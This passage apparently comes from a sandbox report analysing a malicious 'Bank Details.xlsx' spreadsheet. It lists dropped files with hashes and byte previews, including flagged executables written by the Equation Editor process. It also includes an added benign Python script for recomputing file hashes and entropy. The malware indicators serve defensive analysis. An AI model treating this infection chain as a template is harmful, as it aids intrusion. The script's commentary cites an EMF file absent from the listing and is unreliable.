Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3BA968B.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 403x242, frames 3
Category: dropped
Size (bytes): 22499
Entropy (8bit): 6.65776224633818
Encrypted: false
SSDEEP: 384:gtr6sgEVEVEVEVEV8uhjKs00xcg2g38THLMoYyz4g+xG:gtdgIIIII/KsLlr38Tu04gb
MD5: 37D204490B7E5C68D1CF8BA1D7BE31E4
SHA1: F67D5AF4E5381CAB54973D69A8918E974280B795
SHA-256: 4A12A767CE10484F112142993F120E52A0E5390071CA6F24CFC402F3C0548E3A
SHA-512: D85DF3F75BD5E24001014CE6729BAAD8BE420624FFDA326D79E6C4A5830856AEB11F828AB7809B617610E697CA81D9E1393AF3CFB1CC18852A1E5709AC70A4D5
Malicious: false
Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFFB160.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 51166
Entropy (8bit): 7.767050944061069
Encrypted: false
SSDEEP: 1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5: 8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1: 85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256: E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512: F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious: false
Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D971BF97.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 403x242, frames 3
Category: dropped
Size (bytes): 22499
Entropy (8bit): 6.65776224633818
Encrypted: false
SSDEEP: 384:gtr6sgEVEVEVEVEV8uhjKs00xcg2g38THLMoYyz4g+xG:gtdgIIIII/KsLlr38Tu04gb
MD5: 37D204490B7E5C68D1CF8BA1D7BE31E4
SHA1: F67D5AF4E5381CAB54973D69A8918E974280B795
SHA-256: 4A12A767CE10484F112142993F120E52A0E5390071CA6F24CFC402F3C0548E3A
SHA-512: D85DF3F75BD5E24001014CE6729BAAD8BE420624FFDA326D79E6C4A5830856AEB11F828AB7809B617610E697CA81D9E1393AF3CFB1CC18852A1E5709AC70A4D5
Malicious: false
Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC0841E1.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category: dropped
Size (bytes): 14198
Entropy (8bit): 7.916688725116637
Encrypted: false
SSDEEP: 384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5: E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1: 72CA86D260330FC32246D28349C07933E427065D
SHA-256: 7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512: A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious: false
Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
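To check a dropped-file listing like the records above against artifacts you have extracted yourself, the added example below (written for this page, not Joe Sandbox's own code) recomputes the fields each record shows: size, 8-bit Shannon entropy, MD5/SHA1/SHA-256/SHA-512, and a magic-number file type for EMF, PNG and JPEG. It also groups drops whose SHA-256 matches, since the listing shows the same PNG and JPEG bytes saved under two different Content.MSO names. The sample buffers and their names are constructed stand-ins, not the real dropped files; SSDEEP is not reproduced because it needs a library outside the standard library.

```python
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a single repeated byte value,
    8.0 for a uniform distribution over all 256 values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def guess_file_type(data: bytes) -> str:
    """Magic-number check for the three formats in the dropped-file listing.
    An EMF starts with an EMR_HEADER record (type 1, little-endian) and carries
    the ' EMF' signature (0x464D4520) at offset 40, which is why ' EMF' shows up
    near the start of every EMF preview above; PNG and JPEG use their usual
    leading signatures."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "PNG image data"
    if data.startswith(b"\xff\xd8\xff"):
        return "JPEG image data"
    if len(data) >= 44 and data[:4] == b"\x01\x00\x00\x00" and data[40:44] == b" EMF":
        return "Windows Enhanced Metafile (EMF) image data"
    return "data"


def describe(data: bytes) -> dict:
    """Reproduce the per-file fields of the listing (uppercase hex digests, as in the report)."""
    return {
        "size": len(data),
        "entropy": shannon_entropy_8bit(data),
        "file_type": guess_file_type(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def group_identical(files: dict) -> dict:
    """Map SHA-256 -> list of paths, to spot identical bytes dropped under several cache names."""
    groups = defaultdict(list)
    for path, data in files.items():
        groups[hashlib.sha256(data).hexdigest().upper()].append(path)
    return dict(groups)


def _fake_emf(padding: int) -> bytes:
    # Constructed: a 108-byte EMR_HEADER skeleton (type=1, size=108, ' EMF' at
    # offset 40) followed by zero padding, mimicking a mostly-empty metafile.
    header = bytearray(108)
    header[0:4] = (1).to_bytes(4, "little")
    header[4:8] = (108).to_bytes(4, "little")
    header[40:44] = b" EMF"
    return bytes(header) + b"\x00" * padding


# Constructed stand-ins (hypothetical names, not the real dropped files): two
# hash-identical PNGs under different names, one low-entropy EMF, one JPEG.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 8
SAMPLE_FILES = {
    "sample_1.png": PNG_BYTES,
    "sample_2.png": PNG_BYTES,
    "sample.emf": _fake_emf(4096),
    "sample.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + bytes(range(64)) * 4 + b"\xff\xd9",
}


def report(files: dict) -> list:
    """One (path, fields) row per file, in the order given."""
    return [(path, describe(data)) for path, data in files.items()]


if __name__ == "__main__":
    for path, fields in report(SAMPLE_FILES):
        print(path)
        for key, value in fields.items():
            print(f"  {key}: {value}")
    for digest, paths in group_identical(SAMPLE_FILES).items():
        if len(paths) > 1:
            print(f"identical content {digest[:16]}...: {', '.join(paths)}")
```

Run the module directly to print one record per sample; to compare against a report, replace SAMPLE_FILES with bytes read from your own copies of the dropped files. The entropy field is what makes the listing readable at a glance: the 3.2 MB EMF whose preview is almost entirely zero bytes scores about 1.07, while the compressed PNG and JPEG payloads sit between roughly 6.7 and 7.9.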

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD1165B5.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category: dropped
Size (bytes): 14198
Entropy (8bit): 7.916688725116637
Encrypted: false
SSDEEP: 384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5: E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1: 72CA86D260330FC32246D28349C07933E427065D
SHA-256: 7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512: A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E5A3FE6E.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24075
                                                                                                                                                                                                    Entropy (8bit):6.730214296651396
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
                                                                                                                                                                                                    MD5:09AFF1FCE05F6A872A9F9A75B7C645F5
                                                                                                                                                                                                    SHA1:5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
                                                                                                                                                                                                    SHA-256:00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
                                                                                                                                                                                                    SHA-512:355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E71324BD.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):79394
                                                                                                                                                                                                    Entropy (8bit):7.864111100215953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\35ab8wlx6zqe82u0
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):164864
                                                                                                                                                                                                    Entropy (8bit):7.998989332403079
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:5Uc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlR:5Uc2SXli2LbG87uroXR585UcNKbbR
                                                                                                                                                                                                    MD5:9A9A459A5A231E0F2520C491C61FA1DA
                                                                                                                                                                                                    SHA1:7FD4E213B226ABE116437E168F0D27844B983592
                                                                                                                                                                                                    SHA-256:D0728A76A7BF4D436FAC8890A32E8C96B42CCD660B4E48927EB465E334598B1E
                                                                                                                                                                                                    SHA-512:F4CA81A0DB7340FB23AA4E21667838B8C88D5F3C84F47B48D77CD5CA5CE296C260F31B26A29187AB3739DD7196372D5FD40B5699B5D7D118E6C8E6328BCAE447
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: =n.....3@.1..*o..%..(..D.../.x.9....u..{..;.enPL!..#..0.6z.d.{j.......,k..Q.hP#.N.`*.F.76.l.....NZ.D....Mj.....c.e.4...j}A.8.G.GY..Z........M.(C........JF.Q..B.S.....F...m.fcF&HK........,.L,~...... ..Er....y`...0. .(`..s.C.'.9.@.Mg..d....v.EN$.R.W...x.6.\U..?m.V....oIf....U9T.6...>.E..x...+<C@mSf....s.v.......5..G.$o..1..]...(....zg.S.X9.\..ZnbsX@D.N..(I..r.....N...T......i....A...[_],.e....u.D...z~...?\..r.......1....}.....$..C.a.#~.n...#`..E~....fw]"..b..q....1.6 5.:N.~.'9.G o........./K=...._+.U..8...4.}...] ...C@.Bv....k9.h'.`E...zkI..:...r.d5.l.....iH8.P..H..2$"..k].^u.x.1........uX...^.....,/.}BHT...73..... ..My.BV^tV.^ $..r.l.:<+<..k...^.6./. .u......2....<..f`nz.6g^.Z......t..Ox.(.iBV`4.+.B.01..)...?..D..>.....~..'.dm....C..S..<...x<...P......`..&5<...>...u.}4.AQ~.._.V.3t5.......x...\._oF....2..............O-.(..H.TQo.....=...w7R.C...{...j7.Fm..[..<..}...3.."..~...]..*.x..9.........M<.......S:.b....'.e/K....q.m<..l.m..At._.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Cab75AD.tmp
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):58596
                                                                                                                                                                                                    Entropy (8bit):7.995478615012125
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                                                                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                                                                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                                                                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                                                                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):241332
                                                                                                                                                                                                    Entropy (8bit):4.206841657377403
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:cGSLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cPNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                                                                                    MD5:A5ACFBBB152C44BF4E97B87BDF8BEA98
                                                                                                                                                                                                    SHA1:AE0F93CBFB81A23DF4601B745DC81730C9926AD3
                                                                                                                                                                                                    SHA-256:6F588EC9C2352B1775B256184AFB69FB63799900386AABFA4EF4318E0F6DA7DD
                                                                                                                                                                                                    SHA-512:8E765013ED1D0CA8D4184CC2FF07B12B4FC0E6B9EEA9F922CEE09B4A75DF6B3830699D75C07B9FC0A0CA9B1E5070EA6AEE28812D0E0B2D270028F0ECE49FBF41
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Tar75AE.tmp
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):152788
                                                                                                                                                                                                    Entropy (8bit):6.309740459389463
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                                                                                                                                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                                                                                                                                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                                                                                                                                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                                                                                                                                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll
Process: C:\Users\Public\vbc.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5120
Entropy (8bit): 4.171187189386588
Encrypted: false
SSDEEP: 48:StGht7Wr3QTZj0a6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqS:jSrATZX6BD5EhTiGXHBgVueax
MD5: 7023C422B5D2571D6B132378437B1E9E
SHA1: 1F2C41B1E36DDA6ED420B5F8708AF6457F59A10D
SHA-256: 2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
SHA-512: 2659574EDE5079F0B522C01E0FD7FCDD4DED74D895650126979980221BA77582C01DEFA76DDDDA42BC73E4C5CC8268D4285DA29D6C438212503B6ED1529C596D
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 19%
• Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: eQLPRPErea.exe, Detection: malicious
• Filename: Quotation Zhejiang.xlsx, Detection: malicious
C:\Users\user\AppData\Local\Temp\qmnajxcs95hz
Process: C:\Users\Public\vbc.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.96450606123374
Encrypted: false
SSDEEP: 192:mKamyP2+KBf3IfmRxQpCkEAEYfu6tOy7UUwv9:m91i9YsxnkBuN2Q
MD5: 56D7E12AB211686BE29BD8E00F4A46DA
SHA1: AD4A22657ADE632D181D7C523F3203E76695B546
SHA-256: 0F8A856FF0A1A63EA5BBF83BF33C4B61B4444512A53FB43A8811705042DB3A39
SHA-512: 08C01CD9B8F8E5BC5AEA8E031DBA01DEABC85499AAFC3E9228B524C7A5AD2668280B4EBA535A79BAE4F57FF21D460998C0D6D13ADDF24F8D96926C382E8B6960
Malicious: false
C:\Users\user\Desktop\~$Bank Details.xlsx
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5: 96114D75E30EBD26B572C1FC83D1D02E
SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious: false
C:\Users\Public\vbc.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: modified
Size (bytes): 206065
Entropy (8bit): 7.915089020780882
Encrypted: false
SSDEEP: 3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
MD5: 2C64897AA30694CC768F5EA375157932
SHA1: C897F37780A5237D5C330BCF2668745201B38FF5
SHA-256: 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
SHA-512: 6C1CFC20E4AAF0EE78B60A80C5FF559CB71AC31B62F2E9068638046CD3FEC5FE078F37DE85C50C65090B82D784931E07BDF692A597B14133EAE36AD143B3FEA2
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 16%
• Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: Quotation Zhejiang.xlsx, Detection: malicious

Static File Info

General

File type: CDFV2 Encrypted
Entropy (8bit): 7.996517540980423
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: Bank Details.xlsx
File size: 2370560
MD5: c8aa551fd4cc3b5d6e87ea3f025fa6f2
SHA1: 3285390c80ccb179471f31cb4552db8802de518c
SHA256: d22df2dfcfccf5964421ffbbceee8193dc4b6cb6663ea2a3c9687ca57d6779a5
